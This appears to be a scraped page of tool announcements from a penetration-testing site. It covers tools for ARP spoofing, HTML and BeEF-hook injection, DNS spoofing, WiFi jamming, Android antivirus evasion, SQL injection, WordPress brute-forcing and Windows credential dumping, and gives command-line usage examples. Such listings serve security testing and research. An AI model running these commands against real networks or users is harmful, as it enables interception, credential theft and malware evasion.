Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

LANs.py - Inject Code, Jam Wifi, And Spy on Wifi Users

August 25, 2017, 2:17 pm
$
0
0

LANs.py
  • Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
    • Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
  • Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target.
Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
All options:
Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspoint ACCESSPOINT]

Usage

Common usage:
python LANs.py -u -p
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.

Screenshot:


Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.

Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning

HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.
python LANs.py -c '<title>Owned.</title>'
Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'

Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

DNS spoofing
python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org
Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.

Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

Jam all WiFi networks:
python LANs.py --jam

Jam just one access point (router)
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY

All options:
Normal Usage:
  • -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
  • -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
  • -d: open an xterm with driftnet to see all images they view
  • -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
  • -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
  • -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
  • -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
  • -i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
  • -ip: target this IP address
  • -n: performs a quick nmap scan of the target
  • -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
  • -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
  • -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
  • -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
  • -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
  • -v: show verbose URLs which do not truncate at 150 characters like -u
  • --jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary
Wifi Jamming:
  • -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
  • -ch CHANNEL: Limit wifijammer to single channel
  • -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
  • -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
  • -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
  • --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
  • --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
  • --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.

Clean up
Upon receiving a Ctrl-C:
-Turns off IP forwarding
-Flushes iptables firewall
-Individually restores the router and victim's ARP tables


Search

BinaryAlert - Serverless, Real-time & Retroactive Malware Detection

August 26, 2017, 7:30 am
$
0
0

BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spreads.

Features
  • Built with Amazon Web Services (AWS): An AWS account is all you need to deploy BinaryAlert.
  • Broad YARA Support: Add your own YARA rules and/or automatically clone them from third-party repos. Both the PE and math modules are supported.
  • Real-Time: Files uploaded to BinaryAlert (S3 bucket) are immediately queued for analysis.
  • Serverless: All computation is handled by Lambda functions. No servers to manage means stronger security and automatic scaling!
  • Infrastructure-as-Code: The entire infrastructure is described with Terraform configuration files, enabling anyone to deploy BinaryAlert in a matter of minutes with a single command.
  • Retroactive Analysis: After updating the YARA ruleset, BinaryAlert will retroactively scan the entire file corpus to find any new matches.
  • Easily Configurable: BinaryAlert configuration is managed in a single Terraform variables file.
  • Quality Code: Written in Python3 with unit tests and linting to ensure a clean and reliable codebase.
  • Low Cost: The AWS bill is based only on how many files are analyzed.

Quick Start
  1. Install dependencies
    1. Install Python3, pip3, virtualenv, and Terraform.
    2. Create a virtual environment: virtualenv -p python3 venv
    3. Activate the virtual env: source venv/bin/activate
    4. Install third-party libraries: pip3 install -r requirements.txt
      1. If the installation encounters problems finding openssl.h, try export CFLAGS='-I/usr/local/opt/openssl/include' before the install.
  2. Configure settings
    1. Set your AWS credentials using any method supported by Terraform. The two simplest options are to run aws configure (saves ~/.aws/credentials file) or
    export AWS_DEFAULT_REGION="region-name"
    export AWS_ACCESS_KEY_ID="access-key"
    export AWS_SECRET_ACCESS_KEY="secret-key"
    1. Fill out the base configuration options in terraform.tfvars
  3. Deploy: python3 manage.py deploy
  4. In order to receive YARA match alerts, you must manually subscribe to the generated SNS topics. Go to the SNS console and add a subscription to the *_binaryalert_yara_match_alerts topic (which receives YARA match alerts) and the *_binaryalert_metric_alarms topic (which receives CloudWatch alerts if the service is down). SNS supports a variety of subscription endpoints, including email and SMS. SNS subscriptions must be confirmed by the destination, which is why this step can't be automated by Terraform.
That's it! Now any file you upload to the BinaryAlert S3 bucket will automatically trigger YARA analysis and you can rest easier knowing that your files are safe.

CLI Tool: manage.py
For simplicity, BinaryAlert management commands are bundled together in manage.py.
Usage: python3 manage.py [--help] [command]

YARA Rules
YARA rules are stored in the rules/ folder. See rules/README.md for more information about adding and updating YARA rules.

Architecture

  1. The organization collects files and delivers them to their BinaryAlert S3 bucket. Files of interest could include executable binaries, email attachments, documents, etc.
  2. Every file uploaded to the S3 bucket is immediately queued for analysis.
  3. A dispatching Lambda function runs every minute, grouping files into batches and invoking up to dozens of analyzers in parallel.
  4. Each analyzer scans its files using a list of pre-compiled YARA rules.
  5. YARA matches are saved to DynamoDB and an alert is sent to an SNS topic. We use StreamAlert to dispatch these alerts, but other organizations can instead consume the alerts via email or any other supported SNS subscription.
  6. For retroactive analysis, a batching Lambda function enqueues the entire S3 bucket to be re-analyzed.
  7. Configurable CloudWatch alarms will trigger if any BinaryAlert component is behaving abnormally. This will notify a different SNS topic than the one used for YARA match alerts.

Updating Pip Packages
The exact pip3 package versions used are frozen in requirements.txt. However, to make upgrading packages easier, requirements_top_level.txt contains only the top-level packages required by BinaryAlert. To upgrade the package requirements,
pip3 install -r requirements_top_level.txt --upgrade
pip3 freeze > requirements.txt

Directory Overview

AVPASS - Tool For Leaking And Bypassing Android Malware Detection System

August 26, 2017, 3:26 pm
$
0
0

AVPASS is a tool for leaking the detection model of Androidmalware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques. AVPASS is not limited to detection features used by detection systems, and can also infer detection rules so that it can disguise any Androidmalware as a benign application by automatically transforming the APK binary. To prevent leakage of the application logic during transformation, AVPASS provides an Imitation Mode that allows malware developers to safely query curious detection features without sending the entire binary.

AVPASS offers several useful features to transform any Androidmalware so it can bypass anti-virus software. Below are the main features AVPASS offers:
  • APK obfuscation with more than 10 modules
  • Feature inference for the detection system by using individual obfuscation
  • Rule inference of the detection system by using the 2k factorial experiment
  • Targeted obfuscation to bypass a specific detection system
  • Safe query support by using Imitation Mode

DEMO
  • Bypassing API-, Dataflow-, Interaction-based detection systems

  • Inferring and Bypassing AVs through VirusTotal

Running & Docs
More documentation is available in docs/README.md.

Authors
These are the list of contributors for implementing AVPASS:
  • Jinho Jung
  • Chanil Jeon
  • Max Wolotsky
  • Insu Yun

WINspect - Powershell-based Windows Security Auditing Toolbox

August 27, 2017, 9:48 am
$
0
0

WINspect is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. Howerver, some of the functions still apply for standalone workstations.

Features
This current version of the script supports the following features :
  • Checking installed security products .
  • Enumerating World Exposed local filesystem shares.
  • Enumerating domain users and groups with local group membership.
  • Enumerating registry autoruns.
  • Enumerating local services that are configurable by Authenticated Users group members.
  • Enumerating local services for which corresponding binary is writable by Authenticated Users group members.
  • Enumerating non-system32 Windows Hosted Services and their associated DLLs.
  • Enumerating local services with unquoted path vulnerability.
  • Enumerating non-system scheduled tasks.
  • Checking for DLL hijackability.
  • Checking for User Account Contol settings.
  • Checking for unattended installs leftovers.

Supported Powershell Version
This version was tested in a powershell v2.0 environment.


DELTA - SDN Security Evaluation Framework

August 27, 2017, 2:30 pm
$
0
0

DELTA is a penetration testing framework that regenerates known attack scenarios for diverse test cases. This framework also provides the capability of discovering unknown security problems in SDN by employing a fuzzing technique.
  • Agent-Manager is the control tower. It takes full control over all the agents deployed to the target SDN network.
  • Application-Agent is a legitimate SDN application that conducts attack procedures and is controller-dependent. The known malicious functions are implemented as application-agent functions.
  • Channel-Agent is deployed between the controller and the OpenFlow-enabled switch. The agent sniffs and modifies the unencrypted control messages. It is controller-independent.
  • Host-Agent behaves as if it was a legitimate host participating in the target SDN network. The agent demonstrates an attack in which a host attempts to compromise the control plane.

Prerequisites
In order to build and run DELTA, the following are required:
  • An agent manager based on Ubuntu 14.04 LTS 64 bit
    • Ant build system
    • Maven v3.3.9
    • Vagrant
    • JDK 1.7 and 1.8
  • Target Controller (for application agent)
  • Cbench (for channel agent)
  • Mininet 2.1+ (for host agent)
  • (in the case of All-In-One Single Machine) Three virtual machines based on Ubuntu 14.04 LTS 64 bit.
    • VM-1: Target controller + Application agent
    • VM-2: Channel agent
    • VM-3: Host agent

Installing DELTA
DELTA installation depends on maven and ant build system. The mvn command is used to install the agent-manager and the agents. DELTA can support an All-In-One Single Machine environment via virtual machines as well as a real hardware SDN environment.
  • STEP 1. Get the source code of DELTA on the agent manager machine
$ git clone https://github.com/OpenNetworkingFoundation/DELTA.git
  • STEP 2. Install DELTA dependencies
$ cd <DELTA>/tools/dev/delta-setup/
$ ./delta-setup-devenv-ubuntu
  • STEP 3. Install DELTA using maven build
$ cd <DELTA>
$ source ./tools/dev/delta-setup/bash_profile
$ mvn clean install
  • STEP 4-a. (All-In-One Single Machine) Install three virtual machines using vagrant system
$ cd <DELTA>/tools/dev/delta-setup/
$ ./delta-setup-vms-ubuntu
$ cd vagrant/
$ vagrant up
  • STEP 4-b. (All-In-One Single Machine) Add NAT to VM3 (mininet)

  • In the case of all-in-one single machine, the test environment is automatically setup as below:

Configuring your own experiments
  • Execute sudo without the password
$ sudo visudo
In the bottom of the file, type the follow:
username ALL=(ALL) NOPASSWD: ALL
  • Configure passwd-less ssh login for the agents
$ vi <DELTA>/tools/dev/delta-setup/bash_profile
(by default, the addresses are set as vms)
export DELTA_APP=vagrant@10.100.100.11
export DELTA_CHANNEL=vagrant@10.100.100.12
export DELTA_HOST=vagrant@10.100.100.13
$ source <DELTA>/tools/dev/delta-setup/bash_profile

$ cd ~
$ ssh-keygen -t rsa
(Press enter)
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_APP
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_CHANNEL
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_HOST

Check if you can access the VMs without having to enter the password.
  • The agent-manager automatically reads a configuration file and sets up the test environment based on the file. DELTA/tools/config/manager.cfg contains the All-In-One Single Machine configuration by default. If you want to test a real SDN environment, you should specify your own configuration file.
CONTROLLER_SSH=vagrant@10.100.100.11
CHANNEL_SSH=vagrant@10.100.100.12
HOST_SSH=vagrant@10.100.100.13
TARGET_HOST=10.0.0.2
ONOS_ROOT=/home/vagrant/onos-1.6.0
CBENCH_ROOT=/home/vagrant/oflops/cbench/
TARGET_CONTROLLER=Floodlight
TARGET_VERSION=0.91
OF_PORT=6633
OF_VER=1.3
MITM_NIC=eth1
CONTROLLER_IP=10.100.100.11
SWITCH_IP=10.100.100.13,10.100.100.13,10.100.100.13
DUMMY_CONT_IP=10.0.2.2
DUMMY_CONT_PORT=6633
AM_IP=10.0.2.2
AM_PORT=3366
Floodlight 1.2
$ cd <DELTA>/tools/dev/app-agent-setup
$ ./floodlight-1.2-scp
ONOS 1.1
$ cd <DELTA>/tools/dev/app-agent-setup/onos
$ ./onos-1.1.0-scp
(on the controller machine) $ ./onos-1.1.0-setup
ONOS 1.6 or 1.9
$ cd <DELTA>/tools/dev/app-agent-setup/onos
$ ./delta-setup-onos <onos-version>
* Supported ONOS version in the script: 1.6, 1.9
OpenDaylight helium-sr3 (only JDK 1.7-supported)
$ cd <DELTA>/tools/dev/app-agent-setup
$ ./odl-helium-sr3-scp
(on the controller machine) $ ./odl-helium-sr3-setup
OpenDaylight Carbon
$ cd <DELTA>/tools/dev/app-agent-setup
$ ./odl-carbon-scp
(on the controller machine) $ ./odl-carbon-setup
  • The app-agent (on the controller machine) needs 'agent.cfg' file to connect to the agent-manager.
MANAGER_IP=10.0.2.2
MANAGER_PORT=3366

Running DELTA
  • STEP 1. Distribute the executable files to VMs
$ cd <DELTA>
$ source ./tools/dev/delta-setup/bash_profile
$ ./tools/dev/delta-setup/delta-agents-scp
  • STEP 2. Execute Agent-Manager first
$ cd <DELTA>
$ bin/run-delta tools/config/<configuration file> # e.g., manager_vm.cfg

 DELTA: A Penetration Testing Framework for Software-Defined Networks

 [pP] - Show all known attacks
 [cC] - Show configuration info
 [kK] - Replaying known attack(s)
 [uU] - Finding an unknown attack
 [qQ] - Quit

Command>_
  • STEP 3. Connect Web-based UI (port number is 7070)

Main Contributors
  • Seungsoo Lee (KAIST)
  • Jinwoo Kim (KAIST)
  • Changhoon Yoon (KAIST)
  • Sandra Scott-Hayward (Queen's University Belfast)
  • Seungwon Shin (KAIST)

Collaborators
  • Phil Porras, Vinod Yegneswaran (SRI International)
  • Kyuho Hwang, Daewon Jung (National Security Research Institute)
  • Atto Research

Nili - Tool for Network Scan, Man in the Middle, Protocol Reverse Engineering and Fuzzing

August 28, 2017, 7:11 am
$
0
0

Nili is a Tool for Network Scan, Man in the Middle, Protocol Reverse Engineering and Fuzzing.

Prerequisites
  • Python - Python Programming Language
  • Scapy - Interactive Packet Manipulation Program
  • Netzob - Protocol Reverse Engineering, Modeling and Fuzzing

Installing
Here is some Instructions for Installing Prerequisites, Select Proper Instructions for your Operating System.

Unix-like
1- Install Python3 and pip:
$ sudo apt-get install python3
$ sudo apt-get install python3-pip
2- Install Scapy:
$ cd /tmp
$ git clone https://github.com/phaethon/scapy
$ cd scapy
$ sudo python3 setup.py install
3- Install Netzob:
$ git clone https://dev.netzob.org/git/netzob
$ cd ./netzob/
$ sudo apt-get install python3 python3-dev python3-setuptools build-essential
$ python3 setup.py install
$ python3 -m pip install bintrees --upgrade

Windows
1- Install python3
2- Install Scapy:
2-1- Install Winpcap
2-2- Install Scapy3k
python -m pip install scapy-python3
3- Install Netzob

Authors

SQLMap v1.1.8 - Automatic SQL Injection And Database Takeover Tool

August 28, 2017, 2:13 pm
$
0
0

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Links

Translations


Sobelow - Security-Focused Static Analysis for the Phoenix Framework

August 29, 2017, 7:30 am
$
0
0

Sobelow is a security-focused static analysis tool for the Phoenix framework. For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent introducing a number of common vulnerabilities.
Currently Sobelow detects some types of the following security issues:
  • Insecure configuration
  • Known-vulnerable Dependencies
  • Cross-Site Scripting
  • SQL injection
  • Command injection
  • Denial of Service
  • Directory traversal
  • Unsafe serialization

Potential vulnerabilities are flagged in different colors according to confidence in their insecurity. High confidence is red, medium confidence is yellow, and low confidence is green.
A finding is typically marked "low confidence" if it looks like a function could be used insecurely, but it cannot reliably be determined if the function accepts user-supplied input. That is to say, green findings are not secure, they just require greater manual validation.
Note: This project is in constant development, and additional vulnerabilities will be flagged as time goes on. If you encounter a bug, or would like to request additional features or security checks, please open an issue!

Installation
To install Sobelow, you must have a working Elixir environment. Then, execute the following from the command line:
$ mix archive.install hex sobelow
You may also install directly from GitHub with the following command:
$ mix archive.install github nccgroup/sobelow

Use
The simplest way to scan a Phoenix project is to run the following from the project root:
$ mix sobelow

Options
  • --root -r - Specify application root directory
  • --with-code -v - Print vulnerable code snippets
  • --ignore -i - Ignore modules
  • --ignore-files - Ignore files
  • --details -d - Get module details
  • --all-details - Get all module details
  • --private - Skip update checks
  • --router - Specify router location
  • --exit - Return non-zero exit status
  • --format -f - Specify findings output format
  • --quiet - Return no output if there are no findings
  • --compact - Minimal, single-line findings
The root option takes a path argument:
$ mix sobelow --root ../my_project
The with-code option takes no arguments:
$ mix sobelow --with-code
The ignore option takes a comma-separated list of modules:
$ mix sobelow -i XSS.Raw,Traversal
The ignore-files option takes a comma-separated list of file names. File names should be absolute paths, or relative to the application root.
$ mix sobelow --ignore-files config/prod.exs
The details option takes a single module:
$ mix sobelow -d Config.CSRF
The exit option accepts a confidence threshold (low, medium, or high), and will return a non-zero exit status at or above that threshold.
$ mix sobelow --exit Low
The format option accepts an output format for findings. Current formats include txt (the default) and json.
Note: The json format option does not support the --with-code flag. All findings are organized by confidence level, and contain a "type" key. However, other keys may vary between finding types.
$ mix sobelow --format json

Configuration Files
Sobelow allows users to save frequently used options in a configuration file. For example, if you find yourself constantly running:
$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low
You can use the --save-config flag to create your .sobelow-conf config file:
$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low --save-config
This command will create the .sobelow-conf file at the root of your application. You can edit this file directly to make changes.
Now if you want to run Sobelow with the saved configuration, you can run Sobelow with the --config flag.
$ mix sobelow --config

False Positives
Sobelow favors over-reporting versus under-reporting. As such, you may find a number of false positives in a typical scan. These findings may be individually ignored by adding a # sobelow_skip comment, along with a list of modules, before the function definition.
# sobelow_skip ["Traversal"]
def vuln_func(...) do
  ...
end
Then, run the scan with the --skip flag.
$ mix sobelow --skip
Config and Vulnerable Dependency findings cannot be skipped in this way. For these, use the standard ignore option.

Modules
Findings categories are broken up into modules. These modules can then be used to either ignore classes of findings (via the ignore and skip options) or to get vulnerability details (via the details option).
This list, and other helpful information, can be found on the command line:
$ mix help sobelow

Updates
When scanning a project, Sobelow will occasionally check for updates, and will print an alert if a new version is available. Sobelow keeps track of the last update-check by creating a .sobelow file in the root of the scanned project.
If this functionality is not desired, the --private flag can be used with the scan.
$ mix sobelow --private


Search

Comission - WhiteBox CMS Analysis

August 29, 2017, 2:30 pm
$
0
0

CoMisSion is a tool to quickly analyze a CMS setup. The tool:
  • checks for the core version;
  • looks for the last core version;
  • looks for vulnerabilities in core version used;
  • checks for plugins version;
  • looks for vulnerabilities in plugins version used;
A complete report can be generated in XLSX or CSV format.
The tool has been tested on Linux only.

Example
./commision.py -c wordpress -d /cms_dir -o report.xlsx -t XLSX

Installation
git clone https://github.com/Intrinsec/comission
pip install -r requirements.txt

Usage
usage: comission.py [-h] -d DIR -c CMS [-o FILE]

  -h, --help              show this help message and exit
  -d DIR, --dir DIR       CMS root directory
  -c CMS, --cms CMS       CMS type (Drupal, WordPress)
  -o FILE, --output FILE  Path to output file
  -t TYPE, --type TYPE    Type of output file (CSV, XLSX). Default to XLSX.

CMS supported
  • Wordpress
  • Drupal (no vulnerability checks)

Docker
We are not publishing any official image yet. To use the tool with docker, you can build an image. In the project folder, build with:
docker build -t isec/comission .
Then run it with :
docker run -it --rm -v /TARGET_PATH/:/cms_path/ -v /OUTPUT_DIR/:/output/ isec/comission -d /cms_path/ -c drupal -o /output/test_docker.xlsx -t XLSX
Be careful to change the path "TARGET_PATH" and "OUTPUT_DIR" to match your folders.

Author
Paul Mars (Intrinsec)
Based on an idea of Etienne Boursier (Intrinsec)


DSSS - Damn Small SQLi Scanner

August 30, 2017, 7:30 am
$
0
0

Damn Small SQLi Scanner (DSSS) is a fully functional SQL injectionvulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.


As of optional settings it supports HTTP proxy together with HTTP header values User-Agent, Referer and Cookie.

Sample runs
$ python dsss.py -h
Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.2o
 by: Miroslav Stampar (@stamparm)

Usage: dsss.py [options]

Options:
  --version          show program's version number and exit
  -h, --help         show this help message and exit
  -u URL, --url=URL  Target URL (e.g. "http://www.target.com/page.php?id=1")
  --data=DATA        POST data (e.g. "query=test")
  --cookie=COOKIE    HTTP Cookie header value
  --user-agent=UA    HTTP User-Agent header value
  --referer=REFERER  HTTP Referer header value
  --proxy=PROXY      HTTP proxy address (e.g. "http://127.0.0.1:8080")

$ python dsss.py -u "http://testphp.vulnweb.com/artists.php?artist=1"
Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.2o
 by: Miroslav Stampar (@stamparm)

* scanning GET parameter 'artist'
 (i) GET parameter 'artist' could be error SQLi vulnerable (MySQL)
 (i) GET parameter 'artist' appears to be blind SQLi vulnerable (e.g.: 'http://t
estphp.vulnweb.com/artists.php?artist=1%20AND%2061%3E60')

scan results: possible vulnerabilities found

Requirements
Python version 2.6.x or 2.7.x is required for running this program.


Wordpresscan - WPScan rewritten in Python + some WPSeku ideas

August 30, 2017, 2:30 pm
$
0
0

A simple Wordpressscanner written in python based on the work of WPScan (Ruby version)

Install & Launch
Dependencies
pip install requests
pip install tornado
Install
git clone https://github.com/swisskyrepo/Wordpresscan.git
cd Wordpresscan
Example 1 : Basic update and scan of a wordpress
python main.py -u "http://localhost/wordpress" --update --random-agent

-u : Url of the WordPress
--update : Update the wpscan database
--aggressive : Launch an aggressive version to scan for plugins/themes
--random-agent : Use a random user-agent for this session
Example 2 : Basic bruteforce (option --brute, option --nocheck)
python main.py -u "http://127.0.0.1/wordpress/" --brute fuzz/wordlist.lst
python main.py -u "http://127.0.0.1/wordpress/" --brute admin

--brute file.lst : Will bruteforce every username and their password
--brute username : Will bruteforce the password for the given username
it will also try to bruteforce the password for the detected users.


python main.py -u "http://127.0.0.1/wordpress/" --brute fuzz/wordlist.lst --nocheck       
_______________________________________________________________
 _    _               _                                         
| |  | |             | |                                        
| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___  ___ __ _ _ __  
| |/\| |/ _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|/ __/ _` | '_ \
\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \ (_| (_| | | | |
 \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/\___\__,_|_| |_|
                       | |                                      
                       |_|                                      
 WordPress scanner based on wpscan work - @pentest_swissky      
_______________________________________________________________
[+] URL: http://127.0.0.1/wordpress/

[!] The Wordpress 'http://127.0.0.1/wordpress/readme.html' file exposing a version number: 4.4.7
[i] Uploads directory has directory listing enabled : http://127.0.0.1/wordpress/wp-content/uploads/
[i] Includes directory has directory listing enabled : http://127.0.0.1/wordpress/wp-includes/

[i] Bruteforcing all users
[+] User found admin
[+] Starting passwords bruteforce for admin
Bruteforcing - ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
Example 3 : Thinking is overrated, this is aggressive, mostly not advised!
python main.py -u "http://127.0.0.1/wordpress/" --fuzz

[i] Enumerating components from aggressive fuzzing ...
[i] File: http://127.0.0.1/wordpress/license.txt - found
[i] File: http://127.0.0.1/wordpress/readme.html - found
[i] File: http://127.0.0.1/wordpress/wp-admin/admin-footer.php - found
[i] File: http://127.0.0.1/wordpress/wp-admin/css/ - found
[i] File: http://127.0.0.1/wordpress/wp-admin/admin-ajax.php - found
[i] File: http://127.0.0.1/wordpress/wp-activate.php - found
--fuzz :  Will fuzz the website in order to detect as much file, themes and plugins as possible

Credits and Contributorm

RedSnarf - A Pen-Testing / Red-Teaming Tool For Windows Environments

August 31, 2017, 7:30 am
$
0
0

RedSnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques.

RedSnarf functionality includes:
  • Retrieval of local SAM hashes
  • Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;
  • Retrieval of MS cached credentials;
  • Pass-the-hash;
  • Quickly identify weak and guessable username/password combinations (default of administrator/Password01);
  • The ability to retrieve hashes across a range;
  • Hash spraying -
  • Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;
  • Lsass dump for offline analysis with Mimikatz;
  • Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;
  • Dumping of Domain controller hashes using the drsuapi method;
  • Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';
  • Ability to decrypt cpassword hashes;
  • Ability to start a shell on a remote machine;
  • The ability to clear the event logs (application, security, setup or system); (Internal Version only)
